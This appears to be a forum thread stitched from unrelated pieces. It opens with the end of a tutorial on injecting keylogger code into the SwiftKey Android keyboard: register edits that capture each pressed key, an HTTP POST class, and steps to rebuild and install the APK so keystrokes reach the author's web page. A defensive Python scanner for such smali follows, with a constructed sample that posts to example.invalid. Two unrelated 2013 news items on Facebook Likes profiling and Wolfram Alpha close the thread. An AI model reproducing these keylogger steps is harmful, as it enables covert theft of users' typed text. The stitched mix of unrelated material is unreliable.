In our injected code, the v1 local variable holds the CharSequence ‘Hi how are u’, which is converted to a String in the ‘invoke-interface {v1}, Ljava/lang/CharSequence;->toString’ line. We need to make the code use the CharSequence key the user pressed, which is the second parameter, so change v1 to p2.

Next copy over our AsyncTask inner class into the same folder as KeyInputEvent.smali and rename it to KeyInputEvent$AsyncHttpPost. Make similar changes to the TextInputEvent.smali file in the same directory if you want to track SwiftKey flows as well.

[h=2]Rebuilding, Signing and Installing the Apk[/h]

Before, it was a bit of work to do these three steps, but with APK multitool all you need to do is enter 15 in your project with your phone connected and the app should install. If you encountered any errors, post a comment below and I’ll help you out. I might have left a few things out of this tutorial for brevity’s sake. If it all worked and you didn’t change the POST URL, just start using the keyboard and check my page at www.android-app-development.ie/swiftkey_keylogger/keylogs.php to see what keys are being sent from different IPs! Scary huh?
Moral of the story if you want to keep keyloggers or other malware off your Android? Stick to the Play store and don’t pirate apps!

Source: Inserting keylogger code in Android SwiftKey using apktool | Android App Development Ireland
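The post reads smali by hand: it derives the v/p register layout from `.locals` and the method signature, and it shows that the injected code leaves a URL constant next to an AsyncTask/HttpPost call inside an input-event constructor. The script below is an added example, not the post's or SwiftKey's code: it automates both readings over decompiled smali, computing the register map per method and flagging methods that combine a URL string with a network call, which is what a repackaged keyboard of the kind described above would look like. The sample smali and its URL are constructed for the example.

```python
import re

# Constructed sample modelled on the patched KeyInputEvent constructor described
# in the post (locals raised to 6, AsyncTask executed before return-void).
PATCHED_SMALI = """\
.class public abstract Lcom/touchtype/keyboard/inputeventmodel/events/KeyInputEvent;
.super Lcom/touchtype/keyboard/inputeventmodel/events/TextInputEvent;
.method public constructor <init>(Lcom/touchtype_fluency/service/TouchTypeExtractedText;Ljava/lang/CharSequence;)V
    .locals 6
    invoke-direct {p0, p1, p2}, Lcom/touchtype/keyboard/inputeventmodel/events/TextInputEvent;-><init>(Lcom/touchtype_fluency/service/TouchTypeExtractedText;Ljava/lang/CharSequence;)V
    const-string v5, "http://example.invalid/keypresses.php"
    invoke-virtual {v0, v3}, Lcom/touchtype/keyboard/inputeventmodel/events/KeyInputEvent$AsyncHttpPost;->execute([Ljava/lang/Object;)Landroid/os/AsyncTask;
    return-void
.end method
.method public static helper(I)I
    .locals 1
    return p0
.end method
"""

METHOD_RE = re.compile(r"^\.method\s+(?P<mods>(?:[a-z-]+\s+)*)(?P<name>\S+?)\((?P<params>[^)]*)\)(?P<ret>\S+)")
# One match per parameter: object type, array type, or primitive letter.
PARAM_RE = re.compile(r"L[^;]+;|\[+(?:L[^;]+;|[ZBSCIJFD])|[ZBSCIJFD]")
URL_RE = re.compile(r'const-string\s+v\d+,\s+"(https?://[^"]+)"')
NET_RE = re.compile(r"Landroid/os/AsyncTask;|HttpPost|HttpURLConnection|Ljava/net/URL;")


def param_registers(params: str) -> int:
    """Count registers consumed by the parameter list; J and D take two each."""
    return sum(2 if p in ("J", "D") else 1 for p in PARAM_RE.findall(params))


def register_layout(header: str, locals_count: int):
    """Map every register of a method to its meaning, following the post's rule:
    v0..v(n-1) are locals, then the p registers (p0 is 'this' unless static)."""
    m = METHOD_RE.match(header)
    is_static = "static" in m.group("mods").split()
    nparams = param_registers(m.group("params")) + (0 if is_static else 1)
    names = {f"v{i}": f"local {i}" for i in range(locals_count)}
    for i in range(nparams):
        who = "this" if (i == 0 and not is_static) else f"parameter {i}"
        names[f"v{locals_count + i}"] = f"p{i} ({who})"
    return m.group("name"), names


def scan_methods(smali: str):
    """Split a smali file into methods and report register layout, URL constants
    and network-API use; 'suspicious' marks a URL and a network call together."""
    findings = []
    header, body = None, []
    for line in smali.splitlines():
        s = line.strip()
        if s.startswith(".method"):
            header, body = s, []
        elif s == ".end method" and header:
            text = "\n".join(body)
            loc = re.search(r"\.locals\s+(\d+)", text)
            name, regs = register_layout(header, int(loc.group(1)) if loc else 0)
            urls = URL_RE.findall(text)
            net = bool(NET_RE.search(text))
            findings.append({"method": name, "registers": regs, "urls": urls,
                             "network": net, "suspicious": net and bool(urls)})
            header = None
        elif header:
            body.append(s)
    return findings
```

Run it over every .smali file under the decompiled app's input-event package to spot methods that have acquired a network call they had no business making.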
  23. [h=1]How advertisers find out everything about a user just from the Likes given on Facebook[/h]

by Redactia Hit | 12 March 2013

Countless studies have shown that Facebook is, beyond the phenomenon of communication and socialising, a real gold mine for advertisers, who can target the public according to their activities on the social network. Moreover, researchers have demonstrated that the simple Likes you give on the social network can reveal so much data that they can lead to a real portrait of the user's personality.

Researchers from the University of Cambridge, together with Microsoft Research, have demonstrated that by using the MyPersonality application, those interested in users' behaviour on the social network can build a veritable identikit of the users. Quite frightening is the fact that this can be done just by following the Likes someone gives on Facebook and nothing more.

The researchers say that Facebook Likes are the richest source of information about users. Just by following the Likes, the researchers were able to establish the sex, ethnicity, and also the political and religious beliefs of the users. The accuracy of the data obtained from tracking users' Likes is 80%.

Sources: The Verge, The Wall Street Journal

Via: How advertisers find out everything about a user just from the Likes given on Facebook | Hit.ro
  24. [h=1]Wolfram Alpha, the brain behind Siri, will become even smarter[/h]

Dorian Prodan - 12 Mar 2013

Stephen Wolfram, the British researcher behind the Mathematica and Wolfram Alpha projects, announced at the SXSW conference that the impressive computational algorithms behind these services will see radical improvements in the near future, gaining a prediction capability that will simplify their use.

For those less familiar with Wolfram Alpha, it is a computational platform which, based on tens of thousands of billions of data types aggregated from different sources and on tens of thousands of different mathematical algorithms developed over three decades, offers not mere results, like an ordinary search engine, but complex answers. The most famous product that uses the Wolfram Alpha algorithms is Apple's voice assistant Siri, but the company offers a wide range of applications for mobile platforms that allow generic or specialised use of its services.

All these products have one big problem, however: they are rather difficult to use, because users do not always know exactly what they want to find out. To get past this ergonomic handicap, Stephen Wolfram announced that Wolfram Alpha will receive a series of software routines for analysing the data specified or entered by users, allowing it to anticipate the questions they will ask and to offer answers without requiring a cumbersome syntax. One example given by Stephen Wolfram is that of augmented reality applications, which will be able to analyse the surrounding environment, recognise nearby points of interest and offer additional data about them. Other uses will be less spectacular, such as the automatic analysis of data from a spreadsheet chosen by the user, but all are part of the same campaign to simplify the way the service is used.

All these options will be launched in the near future within the applications for mobile devices in the form of a subscription. With this update, the Mathematica platform will also be available through applications on mobile devices.

Source: Wolfram Alpha, the brain behind Siri, will become even smarter